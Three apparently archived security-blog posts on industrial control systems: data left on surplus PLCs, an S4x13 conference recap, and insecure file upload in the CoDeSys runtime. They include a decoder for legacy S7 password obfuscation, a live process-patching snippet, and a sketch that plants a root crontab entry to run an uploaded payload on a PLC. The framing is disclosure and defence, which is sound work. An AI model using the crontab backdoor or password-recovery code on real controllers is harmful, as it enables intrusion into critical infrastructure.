INSIGHTS | July 4, 2013

Why sanitize excessed equipment

My passion for cybersecurity centers on industrial controllers: PLCs, RTUs, and the other “field devices.” These devices are the interface between the integration layer (e.g., HMI systems, historians, and databases) and the physical process (e.g., sensors and actuators). Researching this equipment can be costly because new PLCs and RTUs cost thousands of dollars. Fortunately, I have an ally: surplus resellers that sell used equipment.

I have been buying used equipment for a few years now. Equipment often arrives looking as though it was literally ripped from a factory floor or even a substation, and each controller typically contains a wealth of information about its origin. Even decades-old control equipment has a lot of memory and retains a long record of the previous owner’s process. With just a few hours of reverse engineering work on a controller, it is possible to learn the “secret recipe”: company names, the control system network layout, and production history. Even engineers’ names and contact information are likely to be stored in a controller’s log files. For a bad guy, this data could be useful for all sorts of purposes: social engineering employees, insider trading of company stock, and possibly direct attacks on the corporate network.
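
To give a sense of how little effort that first pass takes, here is a minimal sketch that scans a memory or flash dump for printable strings, much as the Unix strings utility does. The file name and the “interesting” search terms are my own assumptions:

```python
# Sketch: scan a controller memory/flash dump for printable ASCII strings,
# the same way the Unix `strings` utility works. The dump file name and
# the filter terms below are assumptions for illustration.
import re
import sys

def extract_strings(path: str, min_len: int = 6):
    """Yield printable ASCII runs of at least min_len bytes from a binary dump."""
    with open(path, "rb") as f:
        data = f.read()
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group().decode("ascii")

if __name__ == "__main__":
    # Company names, tag names, email addresses, and hostnames tend to
    # show up in cleartext in controller logs and project files.
    interesting = re.compile(r"@|corp|plant|eng|admin", re.IGNORECASE)
    for s in extract_strings(sys.argv[1] if len(sys.argv) > 1 else "controller_dump.bin"):
        if interesting.search(s):
            print(s)
```
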
When I find this kind of information, I reach out to the equipment’s original owner. I help them wipe the equipment, and I point them to where the rest of their equipment is being sold so that they can try to recall it before the stored information ends up in the wrong hands. I am not the only one doing this kind of work: Billy Rios and Terry McCorkle recently revealed surplus equipment that they had purchased from a hospital, and it contained much of the same information about its origin.

These situations can be prevented by sanitizing the equipment before it is released for disposal. Most equipment manufacturers should be able to provide instructions for this process, and one option may be to send the controller back to the manufacturer to be sanitized and refurbished.
Another layer of protection against information disclosure is a robust and well-practiced Incident Response plan. Most organizations that I contact are great to work with and are receptive to the information.

Ignoring the issue, especially where a public utility is concerned, may be considered a violation. Set up an Incident Response program now, and make sure that your process control engineers know to route equipment disposal issues through the IR group.


A great deal can be done to keep a control system secure, and with a little planning, proper equipment disposal is one of the cheapest ways to keep proprietary process information safe.
INSIGHTS | January 25, 2013

S4x13 Conference

S4 is my favorite conference, mainly because it concentrates on industrial control systems security, a subject I am passionate about. I also enjoy the fact that the presentations cover mostly advanced topics and spend very little time on novice material.

Over the past four years, S4 has become more of a bits-and-bytes conference, with presentations that explain, for example, how to upload Trojaned firmware to industrial controllers, and exposés of vulnerabilities (in both the “insecure by design” and the “ICS-CERT” senses of the term).

This year’s conference was packed with top talent from the ICS and SCADA worlds and offered a huge amount of technical information. I tended to follow the “red team” track, as these talks focused on breaking into control systems networks at various levels.

Sergey Gordeychik gave a great talk on vulnerabilities in various ICS software applications, including the release of an “1825-day exploit” for WinCC, a vulnerability that Siemens left unpatched for five years. (It was finally closed in December 2012.)

Alexander Timorin and Dmitry Sklyarov released a new tool for recovering S7 passwords from a packet capture; it is being incorporated into John the Ripper. Homebrew hashing algorithms and authentication mechanisms are a common feature of industrial controllers, and they tend to fall apart under a few days of scrutiny. A trend in the ICS space is the incorporation of ICS-specific attacks into existing attack frameworks, which makes ICS hacking far more accessible to network security assessors, as well as to the “bad guys.” My guess is that this trend will continue in 2013.
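
To give a flavor of how weak these homebrew schemes can be, here is a sketch of the XOR-based password obfuscation used by legacy S7 communications, as implemented in open-source S7 clients such as Snap7. Treat the details as an assumption on my part, not a specification:

```python
# Sketch: de-obfuscating a password field captured from legacy S7 traffic.
# The scheme below matches what open-source S7 clients (e.g., Snap7)
# implement; treat it as illustrative, not authoritative.

def s7_deobfuscate(enc: bytes) -> str:
    """Reverse the legacy S7 session-password obfuscation.

    Encoding: out[0..1] = in[0..1] ^ 0x55
              out[i]    = in[i]    ^ 0x55 ^ out[i-2]   (for i >= 2)
    so decoding needs only the encoded bytes themselves.
    """
    plain = bytearray()
    for i, b in enumerate(enc):
        if i < 2:
            plain.append(b ^ 0x55)
        else:
            plain.append(b ^ 0x55 ^ enc[i - 2])
    return plain.rstrip(b"\x00 ").decode("ascii", "replace")

# Eight obfuscated bytes as they might appear in a hypothetical capture;
# this example decodes to "pass" (padded with spaces before encoding).
print(s7_deobfuscate(bytes([0x25, 0x34, 0x03, 0x12, 0x76, 0x67, 0x03, 0x12])))
```
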
Billy Rios and Terry McCorkle talked about medical controllers and showed a Philips XPER controller that they had purchased on eBay. The computer itself had not been wiped and contained hard-coded accounts, as well as trivially exploitable buffer overflow vulnerabilities, all running on Windows XP.
Arthur Gervais released a slew of vulnerabilities related to Schneider Modicon PLCs. For example, Schneider’s service for updating Unity (the engineering software for Modicon PLCs) and other utilities downloaded software updates over plain HTTP. I was sad to miss his talk due to a conflict in the speaking schedule.
Luigi Auriemma and his colleague Donato Ferrante demonstrated their binary patching system, which allows them to patch applications while they are executing. The technology shows a lot of promise. They are currently marketing it as a way to provide patches for unsupported software, but I think its true potential is patching industrial systems without shutting down the process. It may take a while for any vendor to adopt the technique, but it could be a powerful motivator for end users to apply patches: the need to schedule an outage window is the most-cited reason for not patching industrial systems, and ReVuln, their company, is showing that we can work around this limitation.
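
ReVuln’s implementation is proprietary, but the general idea of patching a live process can be sketched. On Linux, for example, a sufficiently privileged user can rewrite a running process’s code in place via /proc; this toy is mine, not theirs, and the address and byte sequence are purely illustrative:

```python
# Toy illustration of live binary patching on Linux. This is NOT ReVuln's
# technology, just the underlying idea: with CAP_SYS_PTRACE (typically
# root), the code bytes of a running process can be rewritten in place.
import sys

def live_patch(pid: int, addr: int, new_bytes: bytes) -> None:
    """Overwrite code in a running process without restarting it."""
    with open(f"/proc/{pid}/mem", "r+b") as mem:
        mem.seek(addr)
        mem.write(new_bytes)

if __name__ == "__main__":
    # Hypothetical example: NOP out a vulnerable check at a known offset.
    # The pid and address would come from your own analysis.
    pid, addr = int(sys.argv[1]), int(sys.argv[2], 16)
    live_patch(pid, addr, b"\x90\x90\x90\x90\x90\x90")  # x86 NOPs
```
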


My favorite talk was only semi-technical and more defensive than offensive: it covered implementing an SDL and a fuzz-testing strategy at OSIsoft. OSIsoft’s PI Server is the most widely used data historian for industrial processes. Because C-level employees want to keep track of how their process is doing, historical data often must be exported from the control systems network to the corporate network in some fashion. In the best case, this is done by way of a PI Server in a DMZ; in the worst case, a corporate system reaches into the control network to communicate with the PI Server directly. Either way, the result is the same: PI is a likely target for an attacker who wants to jump from the corporate network to the control network. It is terrific, and still all too rare, to see an ICS software company share its security experiences.


Digital Bond provides a nice “by the numbers” look at the conference.
If you are technically inclined, enjoy an international crowd, and want to talk to actual ICS operators, S4 is a great place to start.
INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, a fellow security nut gave me some tips to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool from a hacker’s perspective, and CoDeSys is an unusual ladder logic runtime for a number of reasons.


Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreters/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse engineering interpreted and ASIC-based ladder logic, check out FX’s talk on decoding Stuxnet at C3. It really is amazing, and FX has a level of patience for disassembling code for an unknown CPU that I think is completely unique.


CoDeSys is interesting to me because it does not work like Siemens ladder logic. CoDeSys compiles your ladder logic into native code for the processor on which it will run: on our Wago system that was an x86 processor, so the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and execution of the runtime then jumps into the ladder logic file. This is great for us, because we can easily disassemble a ladder logic file or, better, build our own file that executes system calls.
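
Because the logic is ordinary native code, standard reverse engineering tooling applies directly. Here is a minimal sketch using the Capstone disassembler; the input file name and the offset at which the compiled code begins are assumptions you would recover from your own analysis of the file format:

```python
# Sketch: disassembling compiled ladder logic as ordinary x86 code.
# Requires: pip install capstone. The input path and the offset where
# the executable code begins are assumptions, not documented values.
import sys
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

CODE_OFFSET = 0x100  # hypothetical start of the compiled logic

def disasm_ladder(path: str) -> None:
    with open(path, "rb") as f:
        f.seek(CODE_OFFSET)
        code = f.read()
    md = Cs(CS_ARCH_X86, CS_MODE_32)  # 32-bit x86, as on our Wago target
    for insn in md.disasm(code, CODE_OFFSET):
        print(f"0x{insn.address:08x}: {insn.mnemonic} {insn.op_str}")

if __name__ == "__main__":
    disasm_ladder(sys.argv[1] if len(sys.argv) > 1 else "ladder_logic.prg")
```
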


I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into one of three categories: the runtime executes on top of an embedded OS that lacks code privilege separation; the runtime executes on Linux with a uid of 0; or the runtime executes on top of Windows CE in single-user mode. All three are bad for the same reasons.


All three mean that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts it is even worse, because the APIs for committing Evil are well understood.


I said back in April that 3S is in an amazing and unique position to help secure our critical infrastructure: CoDeSys is used in thousands of product lines made by hundreds of vendors. Implementing secure ladder logic transfer and an encrypted, digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.


3S has published an advisory that recommends setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLCs) make extensive modifications to the runtime source code.


Setting a password on CoDeSys protects code segments: in theory, this prevents a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S includes a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem were fixed, we would still have arbitrary file upload and download with the privileges of the runtime process (remember the note about administrator/root?). So, as a bad guy, I could simply upload a new binary, upload a new copy of the crontab file, and wait patiently for cron to execute my program.
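
To make that chain concrete, here is a sketch of the last two steps. The upload_file() helper is a hypothetical stand-in for the runtime’s unauthenticated file transfer (I am deliberately not reproducing the wire protocol), and the paths assume a Linux-based PLC running the runtime as root:

```python
# Sketch of the crontab attack chain. upload_file() is a hypothetical
# placeholder for the runtime's unauthenticated file-transfer command;
# the paths assume a Linux PLC with the runtime executing as root.

def upload_file(host: str, remote_path: str, data: bytes) -> None:
    raise NotImplementedError("stand-in for the runtime's file transfer")

def plant_cron_backdoor(host: str, payload: bytes) -> None:
    # Step 1: drop our binary somewhere on the PLC's filesystem.
    upload_file(host, "/tmp/evil", payload)
    # Step 2: replace root's crontab so cron runs it every minute.
    crontab = b"* * * * * chmod +x /tmp/evil && /tmp/evil\n"
    upload_file(host, "/var/spool/cron/crontabs/root", crontab)
    # Step 3: wait patiently.
```
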


The solution I would like to see in future CoDeSys releases includes a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and cryptographic protection of the protocol to prevent man-in-the-middle and replay attacks.
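
As one sketch of what that last item could look like: a simple challenge-response design in which the controller issues a one-time nonce, and the engineering workstation must return an HMAC computed over the nonce and the file contents using a pre-shared key. All of the names and the key-provisioning assumption below are mine; this is one possible design, not anything 3S has specified:

```python
# Sketch of replay-resistant, authenticated file upload. A fresh nonce
# per transfer defeats replay; the HMAC defeats tampering in transit.
# Key distribution and the wire protocol are out of scope for this sketch.
import hashlib
import hmac
import os

PRE_SHARED_KEY = b"provisioned-per-device-key"  # assumption: set at commissioning

def controller_issue_nonce() -> bytes:
    return os.urandom(16)  # one-time challenge, never reused

def workstation_sign(nonce: bytes, file_data: bytes) -> bytes:
    return hmac.new(PRE_SHARED_KEY, nonce + hashlib.sha256(file_data).digest(),
                    hashlib.sha256).digest()

def controller_verify(nonce: bytes, file_data: bytes, tag: bytes) -> bool:
    expected = workstation_sign(nonce, file_data)
    return hmac.compare_digest(expected, tag)  # constant-time comparison

# Demo round trip:
nonce = controller_issue_nonce()
logic = b"\x55\x89\xe5"  # stand-in for a compiled ladder logic file
tag = workstation_sign(nonce, logic)
assert controller_verify(nonce, logic, tag)
print("upload authenticated; replaying this tag against a new nonce will fail")
```
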